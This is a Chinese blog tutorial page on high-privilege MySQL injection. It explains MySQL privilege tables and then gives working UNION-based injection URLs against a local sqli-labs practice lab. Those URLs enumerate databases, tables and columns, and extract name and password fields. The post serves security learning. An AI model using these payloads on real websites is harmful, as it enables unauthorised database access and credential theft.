<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"www.oliver.ren","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="在数据库中区分有数据库系统用户与数据库普通用户，二者的划分主要体现在对一些高级函数与资源表的访问权限上。 直白一些就是高权限系统用户拥有整个数据库的操作权限，而普通用户只拥有部分已配置的权限。 网站在创建的时候会调用数据库链接，会区分系统用户链接与普通用户链接；当多个网站存在一个数据库的时候，root就拥有最高权限可以对多个网站进行管辖，普通用户仅拥有当前网站和配置的部分权限。 所以当我们获取到普">
<meta property="og:type" content="article">
<meta property="og:title" content="MySQL注入之高权限注入">
<meta property="og:url" content="https://www.oliver.ren/2025/03/04/20250304-02.html">
<meta property="og:site_name" content="Oliver&#39;s Blog">
<meta property="og:description" content="在数据库中区分有数据库系统用户与数据库普通用户，二者的划分主要体现在对一些高级函数与资源表的访问权限上。 直白一些就是高权限系统用户拥有整个数据库的操作权限，而普通用户只拥有部分已配置的权限。 网站在创建的时候会调用数据库链接，会区分系统用户链接与普通用户链接；当多个网站存在一个数据库的时候，root就拥有最高权限可以对多个网站进行管辖，普通用户仅拥有当前网站和配置的部分权限。 所以当我们获取到普">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://www.oliver.ren/assets/20250304/1441e448156f4fefb70c59acd4346c29.png">
<meta property="og:image" content="https://www.oliver.ren/assets/20250304/2103c8de624f41d0a7eee738b4582099.png">
<meta property="og:image" content="https://www.oliver.ren/assets/20250304/3fabd239d574498898ae94a7d4e06c15.png">
<meta property="og:image" content="https://www.oliver.ren/assets/20250304/80dd809259b84708a972f29518056e97.png">
<meta property="og:image" content="https://www.oliver.ren/assets/20250304/152e6aa705cb423ca4a115fb6650821f.png">
<meta property="og:image" content="https://www.oliver.ren/assets/20250304/d57eba517a0f438484a1f440e5a24f86.png">
<meta property="article:published_time" content="2025-03-04T13:44:34.000Z">
<meta property="article:modified_time" content="2025-03-04T13:51:26.208Z">
<meta property="article:author" content="Oliver King">
<meta property="article:tag" content="MySQL">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://www.oliver.ren/assets/20250304/1441e448156f4fefb70c59acd4346c29.png">


<link rel="canonical" href="https://www.oliver.ren/2025/03/04/20250304-02.html">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://www.oliver.ren/2025/03/04/20250304-02.html","path":"2025/03/04/20250304-02.html","title":"MySQL注入之高权限注入"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>MySQL注入之高权限注入 | Oliver's Blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Oliver's Blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">小菜鸟要努力学习哦</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%A4%9A%E4%B8%AA%E7%BD%91%E7%AB%99%E5%85%B1%E4%BA%ABMySQL%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="nav-number">1.</span> <span class="nav-text">多个网站共享MySQL服务器</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#MySQL%E6%9D%83%E9%99%90%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.1.</span> <span class="nav-text">MySQL权限介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E6%89%80%E6%9C%89%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E7%A7%B0"><span class="nav-number">1.2.</span> <span class="nav-text">查询所有数据库名称</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E6%95%B0%E6%8D%AE%E5%BA%93%E5%AF%B9%E5%BA%94%E7%9A%84%E8%A1%A8%E5%90%8D"><span class="nav-number">1.3.</span> <span class="nav-text">查询数据库对应的表名</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E8%A1%A8%E5%90%8D%E5%AF%B9%E5%BA%94%E7%9A%84%E5%AD%97%E6%AE%B5%E5%90%8D"><span class="nav-number">1.4.</span> <span class="nav-text">查询表名对应的字段名</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E6%95%B0%E6%8D%AE"><span class="nav-number">1.5.</span> <span class="nav-text">查询数据</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Oliver King</p>
  <div class="site-description" itemprop="description">Oliver's Blog|小菜鸟要努力学习哦</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">32</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://www.oliver.ren/2025/03/04/20250304-02.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Oliver King">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Oliver's Blog">
      <meta itemprop="description" content="Oliver's Blog|小菜鸟要努力学习哦">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="MySQL注入之高权限注入 | Oliver's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          MySQL注入之高权限注入
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2025-03-04 21:44:34 / 修改时间：21:51:26" itemprop="dateCreated datePublished" datetime="2025-03-04T21:44:34+08:00">2025-03-04</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>在数据库中区分有数据库系统用户与数据库普通用户，二者的划分主要体现在对一些高级函数与资源表的访问权限上。</p>
<p>直白一些就是高权限系统用户拥有整个数据库的操作权限，而普通用户只拥有部分已配置的权限。</p>
<p>网站在创建的时候会调用数据库链接，会区分系统用户链接与普通用户链接；当多个网站存在一个数据库的时候，root就拥有最高权限可以对多个网站进行管辖，普通用户仅拥有当前网站和配置的部分权限。</p>
<p>所以当我们获取到普通用户权限时，我们只拥有单个数据库权限，甚至文件读写失败；取得高权限用户权限，不仅可以查看所有数据库，还可以对服务器文件进行读写操作。</p>
<h1 id="多个网站共享MySQL服务器"><a href="#多个网站共享MySQL服务器" class="headerlink" title="多个网站共享MySQL服务器"></a>多个网站共享MySQL服务器</h1><p><img src="/./assets/20250304/1441e448156f4fefb70c59acd4346c29.png" alt="多个网站共享MySQL服务器"></p>
<h2 id="MySQL权限介绍"><a href="#MySQL权限介绍" class="headerlink" title="MySQL权限介绍"></a>MySQL权限介绍</h2><p>MySQL中存在4个控制权限的表，分别为user表，db表，tables_priv表，columns_priv表，当前演示的版本MySQL 5.7.22</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">select * from user where user=&#x27;root&#x27; and host=&#x27;localhost&#x27;\G;</span><br><span class="line"></span><br><span class="line">	mysql权限表的验证过程为：</span><br><span class="line"></span><br><span class="line">	先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在，存在则通过验证。</span><br><span class="line"></span><br><span class="line">	通过身份认证后，进行权限分配，</span><br><span class="line">	按照user，db，tables_priv，columns_priv的顺序进行验证。</span><br><span class="line">	即先检查全局权限表user，如果user中对应的权限为Y，则此用户对所有数据库的权限都为Y，</span><br><span class="line">	将不再检查db, tables_priv,columns_priv；如果为N，则到db表中检查此用户对应的具体数据库，</span><br><span class="line">	并得到db中为Y的权限；如果db中为N，则检查tables_priv中此数据库对应的具体表，取得表中的权限Y，以此类推。</span><br><span class="line"> </span><br><span class="line">  系统权限表</span><br><span class="line">	User表：存放用户账户信息以及全局级别（所有数据库）权限，决定了来自哪些主机的哪些用户可以访问数据库实例，如果有全局权限则意味着对所有数据库都有此权限 </span><br><span class="line">	Db表：存放数据库级别的权限，决定了来自哪些主机的哪些用户可以访问此数据库 </span><br><span class="line">	Tables_priv表：存放表级别的权限，决定了来自哪些主机的哪些用户可以访问数据库的这个表 </span><br><span class="line">	Columns_priv表：存放列级别的权限，决定了来自哪些主机的哪些用户可以访问数据库表的这个字段 </span><br><span class="line">	Procs_priv表：存放存储过程和函数级别的权限</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> 2.MySQL 权限级别分为： </span><br><span class="line">	全局性的管理权限： 作用于整个MySQL实例级别 </span><br><span class="line">	数据库级别的权限： 作用于某个指定的数据库上或者所有的数据库上 </span><br><span class="line">	数据库对象级别的权限：作用于指定的数据库对象上（表、视图等）或者所有的数据库对象</span><br><span class="line"> </span><br><span class="line"> 3.查看mysql 有哪些用户：</span><br><span class="line">	mysql&gt; select user,host from mysql.user;</span><br><span class="line"> </span><br><span class="line"> 4.查看用户对应权限</span><br><span class="line"> select * from user where user=&#x27;root&#x27; and host=&#x27;localhost&#x27;\G;  #所有权限都是Y ，就是什么权限都有</span><br><span class="line"> </span><br><span class="line"> 5.创建 mysql 用户</span><br><span class="line">	有两种方式创建MySQL授权用户</span><br><span class="line"></span><br><span class="line">	执行create user/grant命令（推荐方式）</span><br><span class="line">	CREATE USER &#x27;finley&#x27;@&#x27;localhost&#x27; IDENTIFIED BY &#x27;some_pass&#x27;;</span><br><span class="line">	通过insert语句直接操作MySQL系统权限表</span><br><span class="line"> </span><br><span class="line"> 6.只提供id查询权限</span><br><span class="line">    grant select(id) on test.temp to test1@&#x27;localhost&#x27; identified by &#x27;123456&#x27;;</span><br><span class="line"> </span><br><span class="line"> 7.把普通用户变成管理员</span><br><span class="line">	GRANT ALL PRIVILEGES ON *.* TO &#x27;test1&#x27;@&#x27;localhost&#x27; WITH GRANT OPTION;</span><br><span class="line"></span><br><span class="line"> 8.删除用户</span><br><span class="line">	drop user finley@&#x27;localhost&#x27;;</span><br></pre></td></tr></table></figure>

<p><img src="/./assets/20250304/2103c8de624f41d0a7eee738b4582099.png" alt="SQL注入之高权限注入"></p>
<p>注入流程与上节相同</p>
<h2 id="查询所有数据库名称"><a href="#查询所有数据库名称" class="headerlink" title="查询所有数据库名称"></a>查询所有数据库名称</h2><p><img src="/./assets/20250304/3fabd239d574498898ae94a7d4e06c15.png" alt="查询所有数据库名称"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-2/?id=-2%20union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata</span><br></pre></td></tr></table></figure>

<h2 id="查询数据库对应的表名"><a href="#查询数据库对应的表名" class="headerlink" title="查询数据库对应的表名"></a>查询数据库对应的表名</h2><p><img src="/./assets/20250304/80dd809259b84708a972f29518056e97.png" alt="查询数据库对应的表名"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-2/?id=-2%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=0x74657374</span><br></pre></td></tr></table></figure>

<h2 id="查询表名对应的字段名"><a href="#查询表名对应的字段名" class="headerlink" title="查询表名对应的字段名"></a>查询表名对应的字段名</h2><p><img src="/./assets/20250304/152e6aa705cb423ca4a115fb6650821f.png" alt="查询表名对应的字段名"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-2/?id=-2%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=0x7431</span><br></pre></td></tr></table></figure>

<h2 id="查询数据"><a href="#查询数据" class="headerlink" title="查询数据"></a>查询数据</h2><p><img src="/./assets/20250304/d57eba517a0f438484a1f440e5a24f86.png" alt="查询数据"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-2/?id=-2%20union%20select%201,name,pass%20from%20test.t1</span><br></pre></td></tr></table></figure>
    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/MySQL/" rel="tag"># MySQL</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/03/04/20250304-01.html" rel="prev" title="MySQL手工注入之数字型注入">
                  <i class="fa fa-angle-left"></i> MySQL手工注入之数字型注入
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Oliver King</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>







  





</body>
</html>
